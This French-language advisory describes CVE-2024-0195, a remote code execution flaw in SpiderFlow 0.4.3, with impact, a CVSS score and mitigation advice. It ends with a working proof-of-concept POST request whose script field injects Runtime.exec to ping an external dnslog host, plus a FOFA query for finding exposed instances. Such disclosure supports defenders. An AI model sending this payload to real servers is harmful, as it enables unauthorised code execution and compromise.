
Exploit de preuve de concept pour CVE-2024-0195, une vulnérabilité critique d'injection de code dans SpiderFlow 0.4.3 permettant l'exécution de code à distance via le point de terminaison FunctionService.saveFunction.
CVE-2024-0195 est une vulnérabilité critique d'injection de code dans l'application web spider-flow 0.4.3, spécifiquement dans la fonction FunctionService.saveFunction du fichier FunctionController.java. Un attaquant peut injecter à distance du code malveillant qui s'exécute sur le serveur. Cela permet une compromission totale de l'application.
Cette vulnérabilité est extrêmement grave car elle permet l'exécution de code à distance sur le serveur hébergeant l'application spider-flow vulnérable. Un attaquant pourrait compromettre totalement le serveur, voler des données sensibles, installer des logiciels malveillants ou des mineurs de crypto-monnaies, et l'utiliser pour d'autres attaques à l'intérieur du réseau. La confidentialité, l'intégrité et la disponibilité de l'application et du serveur sont toutes gravement impactées.
Une version corrigée n'est pas explicitement mentionnée, donc corriger le problème ne semble actuellement pas une option. La vulnérabilité a été divulguée publiquement et des exploits sont disponibles, une atténuation immédiate est donc cruciale.
En attendant qu'un correctif officiel soit publié, spider-flow 0.4.3 doit être immédiatement mis hors ligne ou son accès limité aux réseaux/utilisateurs de confiance. Des pare-feu d'application web ou d'autres contrôles de validation d'entrée pourraient potentiellement être configurés pour détecter et bloquer les tentatives d'injection de code en tant qu'atténuation provisoire. Cependant, ce ne sont pas des solutions complètes et la version vulnérable doit être mise à niveau dès qu'une version corrigée est disponible.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ Preuve de concept
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B